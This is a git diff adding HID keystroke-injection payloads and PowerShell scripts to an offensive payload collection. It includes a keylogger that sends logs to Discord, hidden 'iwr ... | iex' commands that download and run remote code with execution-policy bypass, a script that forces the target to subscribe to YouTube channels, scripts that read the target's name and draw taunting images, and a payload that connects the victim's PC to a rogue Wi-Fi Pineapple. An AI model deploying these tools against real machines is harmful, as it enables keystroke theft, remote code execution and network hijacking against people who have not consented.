+REM Description: This is a Powershell based keylogger that exfiltrates the logs to discord
+
+REM Target: Windows 10, 11
+
+REM ADDITIONAL PARAMETERS
+REM The payload is set to send the logs collected every hour on the hour
+
+REM You maybe use the $log variable to specify a certain time instead (Use this for testing)
+REM ex: $log="09:00 pm" <-- This will send the log every night at 9pm
+REM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date
+
+REM $ks="12/25/2022 10:00:00 PM" <-- This will make the keylogger self delete at 10pm on December 25th
+
+REM Calling the script with both a log time and killswitch will look something like this:
+
+REM $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' | iex"
+ENTER
diff --git a/Payloads/MustSub/MustSub-Execute.txt b/Payloads/MustSub/MustSub-Execute.txt
new file mode 100644
index 0000000..b7d7325
--- /dev/null
+++ b/Payloads/MustSub/MustSub-Execute.txt
@@ -0,0 +1,11 @@
+REM Title: MustSub
+REM Author: I am Jakoby
+REM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels
+REM Target: Windows 10, 11
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex
+ENTER
diff --git a/Payloads/MustSub/MustSub.ps1 b/Payloads/MustSub/MustSub.ps1
new file mode 100644
index 0000000..a027b56
--- /dev/null
+++ b/Payloads/MustSub/MustSub.ps1
@@ -0,0 +1,40 @@
+$channels = @"
+https://www.youtube.com/iamjakoby
+https://www.youtube.com/c/CosmodiumCS
+https://www.youtube.com/c/zSecurity
+https://www.youtube.com/c/SystemExploited/featured
+https://www.youtube.com/c/Lab401
+https://www.youtube.com/c/TheCyberMentor
+https://www.youtube.com/c/JohnHammond010
+https://www.youtube.com/c/MalwareTechBlog
+https://www.youtube.com/c/SecurityFWD
+https://www.youtube.com/c/Nahamsec
+https://www.youtube.com/c/jhaddix
+https://www.youtube.com/c/NetworkChuck
+https://www.youtube.com/c/DavidBombal
+https://www.youtube.com/c/JimBrowning
+https://www.youtube.com/user/TechInterpreterInc
+"@
+
+$URLs = $channels -split "`n"
+
+function subscribe {
+
+[CmdletBinding()]
+param (
+[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)]
+[string]$channel
+)
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$url = -join($channel,"?sub_confirmation=1")
+Start-Process $url
+Start-Sleep -Seconds 3
+[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2)
+[System.Windows.Forms.SendKeys]::SendWait('{ENTER}')
+Start-Sleep -Seconds 1
+[System.Windows.Forms.SendKeys]::SendWait('%{F4}')
+Start-Sleep -Seconds 1
+}
+
+foreach ($channel in $URLs) {subscribe $channel}
diff --git a/Payloads/MustSub/Readme.md b/Payloads/MustSub/Readme.md
new file mode 100644
index 0000000..9e7720f
--- /dev/null
+++ b/Payloads/MustSub/Readme.md
@@ -0,0 +1,121 @@
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Must Sub
+
+A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels.
+
+## Description
+
+This script will loop through an array of URLs.
+
+Each URL will be passed through the subscribe function.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+
+
diff --git a/Payloads/PS-Draw/Images/PS-Draw.jpg b/Payloads/PS-Draw/Images/PS-Draw.jpg
new file mode 100644
index 0000000..78f7d5f
Binary files /dev/null and b/Payloads/PS-Draw/Images/PS-Draw.jpg differ
diff --git a/Payloads/PS-Draw/Images/images b/Payloads/PS-Draw/Images/images
new file mode 100644
index 0000000..b66011e
--- /dev/null
+++ b/Payloads/PS-Draw/Images/images
@@ -0,0 +1 @@
+images will be stored here
diff --git a/Payloads/PS-Draw/Images/omg-ico.png b/Payloads/PS-Draw/Images/omg-ico.png
new file mode 100644
index 0000000..d967bba
Binary files /dev/null and b/Payloads/PS-Draw/Images/omg-ico.png differ
diff --git a/Payloads/PS-Draw/Images/ps-colors.jpg b/Payloads/PS-Draw/Images/ps-colors.jpg
new file mode 100644
index 0000000..f865281
Binary files /dev/null and b/Payloads/PS-Draw/Images/ps-colors.jpg differ
diff --git a/Payloads/PS-Draw/Images/ps-hak5.jpg b/Payloads/PS-Draw/Images/ps-hak5.jpg
new file mode 100644
index 0000000..30b6644
Binary files /dev/null and b/Payloads/PS-Draw/Images/ps-hak5.jpg differ
diff --git a/Payloads/PS-Draw/Images/ps-omg.jpg b/Payloads/PS-Draw/Images/ps-omg.jpg
new file mode 100644
index 0000000..cef9357
Binary files /dev/null and b/Payloads/PS-Draw/Images/ps-omg.jpg differ
diff --git a/Payloads/PS-Draw/PS-Custom-Draw.ps1 b/Payloads/PS-Draw/PS-Custom-Draw.ps1
new file mode 100644
index 0000000..73c22bc
--- /dev/null
+++ b/Payloads/PS-Draw/PS-Custom-Draw.ps1
@@ -0,0 +1,232 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose.
+ To increase the size of the pixels add more spaces to the following Write-Host command.
+ Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
+
+.DESCRIPTION
+ This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window.
+
+.SYNTAX
+ $col | PS-Draw
+ $hak5 | PS-Draw
+ $omg | PS-Draw
+ PS-Draw -Image $col
+ PS-Draw -Image $hak5
+ PS-Draw -Image $omg
+#>
+############################################################################################################################################################
+
+$Colors = @{
+ 1 = 'White'
+ 2 = 'Black'
+ 3 = 'DarkBlue'
+ 4 = 'DarkGreen'
+ 5 = 'DarkCyan'
+ 6 = 'DarkRed'
+ 7 = 'DarkMagenta'
+ 8 = 'DarkYellow'
+ 9 = 'Gray'
+ 10 = 'DarkGray'
+ 11 = 'Blue'
+ 12 = 'Green'
+ 13 = 'Cyan'
+ 14 = 'Red'
+ 15 = 'Magenta'
+ 16 = 'Yellow'
+}
+
+ #Show available colors
+$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),
+ @(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),
+ @(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),
+ @(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),
+ @(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),
+ @(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),
+ @(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),
+ @(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),
+ @(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),
+ @(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),
+ @(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),
+ @(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),
+ @(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),
+ @(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),
+ @(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)
+
+
+$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
+ @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
+ @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
+ @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
+ @(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
+ @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
+ @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
+ @(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),
+ @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),
+ @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
+ @(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),
+ @(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),
+ @(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),
+ @(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)
+
+
+$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),
+ @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
+ @(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),
+ @(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),
+ @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
+
+# -------------------------------------------------------------------------------------------
+
+
+function PS-Draw {
+ [CmdletBinding()]
+ param (
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("I")]
+ [object[]]$Image
+ )
+
+ # if the data is sent through the pipeline, use $input to collect is as array
+ if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }
+ #$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" }
+
+ cls
+
+ foreach ($row in $Image) {
+ foreach ($position in $row) {
+ Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
+ Start-Sleep -m 10
+ }
+ Write-Host ""
+ }
+}
+
+<#
+
+.NOTES
+ This will get either the targets full name associated with the registered microsoft account
+ or it will default to grabbing the username of the account to use as a greeting for this script
+#>
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+# -------------------------------------------------------------------------------------------
+
+# Get name to be used in greeting
+
+cls
+
+$fullName = Get-fullName
+
+echo "Hello $fullName"
+
+# -------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continuously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue the script
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+
+<#
+
+.NOTES
+ This is where you call the function to draw out one of the images above
+ $col - to see the available colors you can use for a custom image
+ $hak5 - this will draw out the hak5 five logo
+ $omg - this will draw out the omg logo
+#>
+
+# -------------------------------------------------------------------------------------------
+
+# Call function with one of the arrays listed above to generate an image
+
+$hak5 | PS-Draw
+
+
diff --git a/Payloads/PS-Draw/PS-Draw.ps1 b/Payloads/PS-Draw/PS-Draw.ps1
new file mode 100644
index 0000000..babc366
--- /dev/null
+++ b/Payloads/PS-Draw/PS-Draw.ps1
@@ -0,0 +1,201 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
+ well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My example image is 25x20 pixels
+ To increase the size of the pixels add more spaces to the following Write-Host command.
+ Write-Host " " -NoNewline -BackgroundColor $BackGround
+
+.DESCRIPTION
+ This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color
+ that can be used in powershell. Finally that image will be drawn in a powershell window.
+
+.SYNTAX
+ "$env:TMP\omg-ico.png" | PS-Draw
+ PS-Draw -Path "$env:TMP\omg-ico.png"
+#>
+############################################################################################################################################################
+
+Function PS-Draw
+{
+ param(
+ [String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,
+ [Switch] $ToASCII
+ )
+ Begin
+ {
+ [void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
+
+ # Console Colors and their Hexadecimal values
+ $Colors = @{
+ 'FFFFFFFF' = 'White'
+ 'FF000000' = 'Black'
+ 'FF000080' = 'DarkBlue'
+ 'FF008000' = 'DarkGreen'
+ 'FF008080' = 'DarkCyan'
+ 'FF800000' = 'DarkRed'
+ 'FF800080' = 'DarkMagenta'
+ 'FF808000' = 'DarkYellow'
+ 'FFC0C0C0' = 'Gray'
+ 'FF808080' = 'DarkGray'
+ 'FF0000FF' = 'Blue'
+ 'FF00FF00' = 'Green'
+ 'FF00FFFF' = 'Cyan'
+ 'FFFF0000' = 'Red'
+ 'FFFF00FF' = 'Magenta'
+ 'FFFFFF00' = 'Yellow'
+
+ }
+
+ # Algorithm to calculate closest Console color (Only 16) to a color of Pixel
+ Function Get-ClosestConsoleColor($PixelColor)
+ {
+ ($(foreach ($item in $Colors.Keys) {
+ [pscustomobject]@{
+ 'Color' = $Item
+ 'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
+ }
+ }) | Sort-Object Diff)[0].color
+ }
+ }
+ Process
+ {
+ Foreach($item in $Path)
+ {
+ #Convert Image to BitMap
+ $BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
+
+ Foreach($y in (1..($BitMap.Height-1)))
+ {
+ Foreach($x in (1..($BitMap.Width-1)))
+ {
+ $Pixel = $BitMap.GetPixel($X,$Y)
+ $BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
+
+
+ If($ToASCII) # Condition to check ToASCII switch
+ {
+ Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
+ }
+ else
+ {
+ Write-Host " " -NoNewline -BackgroundColor $BackGround
+ }
+ }
+ Write-Host '' # Blank write-host to Start the next row
+ }
+ }
+
+ }
+ end
+ {
+
+ }
+
+}
+
+<#
+
+.NOTES
+ This will get either the targets full name associated with the registered microsoft account
+ or it will default to grabbing the username of the account to use as a greeting for this script
+#>
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+# -------------------------------------------------------------------------------------------
+# Download the image from wherever you are hosting it
+
+iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png
+
+# -------------------------------------------------------------------------------------------
+
+# Get name to use in the greeting
+
+cls
+
+$fullName = Get-fullName
+
+echo "Hello $fullName"
+# -------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ Then the script will be paused until the mouse is moved
+ script will check mouse position every indicated number of seconds
+ This while loop will constantly check if the mouse has been moved
+ "CAPSLOCK" will be continuously pressed to prevent screen from turning off
+ it will then sleep for the indicated number of seconds and check again
+ when mouse is moved it will break out of the loop and continue the script
+#>
+
+
+Add-Type -AssemblyName System.Windows.Forms
+$o=New-Object -ComObject WScript.Shell
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+
+
+<#
+
+.NOTES
+ This is where you call the function to draw out your image
+ Replace the path below with the path of your image
+
+.SYNTAX
+ "$env:TMP\omg-ico.png" | PS-Draw
+ PS-Draw -Path "$env:TMP\omg-ico.png"
+#>
+
+# -------------------------------------------------------------------------------------------
+
+# Call the function with the image you'd like to have drawn here
+
+"$env:TMP\omg-ico.png" | PS-Draw
+
diff --git a/Payloads/PS-Draw/PS-Draw.txt b/Payloads/PS-Draw/PS-Draw.txt
new file mode 100644
index 0000000..c7f2762
--- /dev/null
+++ b/Payloads/PS-Draw/PS-Draw.txt
@@ -0,0 +1,17 @@
+REM Title: PS-Draw
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to draw images in your targets powershell console. See PS-Draw.ps1 for more details
+REM
+REM Target: Windows 10, 11
+REM
+REM Remember to replace the link with your link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM Download one of the two PS-Draw Execute files provided and execute it
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/Payloads/PS-Draw/README.md b/Payloads/PS-Draw/README.md
new file mode 100644
index 0000000..667cd39
--- /dev/null
+++ b/Payloads/PS-Draw/README.md
@@ -0,0 +1,146 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# PS-Draw
+
+A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims.
+
+## Description
+
+These two programs use two different methods to draw out images in the PowerShell window.
+
+PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors,
+then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well.
+
+PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself.
+These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
+
+After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the
+UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or another image hosting service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your Device
+* Invoke-WebRequest will be used to download the image
+
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1
+```
+* The image will be converted into a BMP file
+* An algorithm will be used to find the closest matching colors available in the powershell window
+* The image will be generated in the powershell window
+
+This is an example of an image I used with the PS-Draw command
+
+
+
+This is how the iamge is interpreted and drawn out
+
+
+* The PS-Custom-Draw operates a little differently
+* One of the preconfigured arrays is piped into the command to generate an image
+
+* "$col | PS-Draw" - This first one will show the available colors to be used as seen below
+
+
+
+
+* "$omg | PS-Draw" - This will draw out the OMG logo as seen below
+
+
+
+
+* "$hak5 | PS-Draw" - This will draw out the Hak5 logo as seen below
+
+
+
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/PineApple/PineApple-KeyInjection.txt b/Payloads/PineApple/PineApple-KeyInjection.txt
new file mode 100644
index 0000000..33e0595
--- /dev/null
+++ b/Payloads/PineApple/PineApple-KeyInjection.txt
@@ -0,0 +1,79 @@
+REM Title: PineApple
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version is a direct key stroke injection attack
+REM Author: I am Jakoby
+REM Target: Windows 10, 11
+REM
+DELAY 1000
+REM
+REM If the wifi pineapple SSID is detected target PC will connect to it
+REM
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+REM
+DELAY 1000
+REM
+STRING $profilefile="Home.xml";
+SHIFT ENTER
+STRING $SSID="PineApple";
+SHIFT ENTER
+STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+SHIFT ENTER
+DELAY 500
+STRING $xmlfile="
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSIDHEX
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING ESS
+SHIFT ENTER
+STRING manual
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING open
+SHIFT ENTER
+STRING none
+SHIFT ENTER
+STRING false
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING "
+SHIFT ENTER
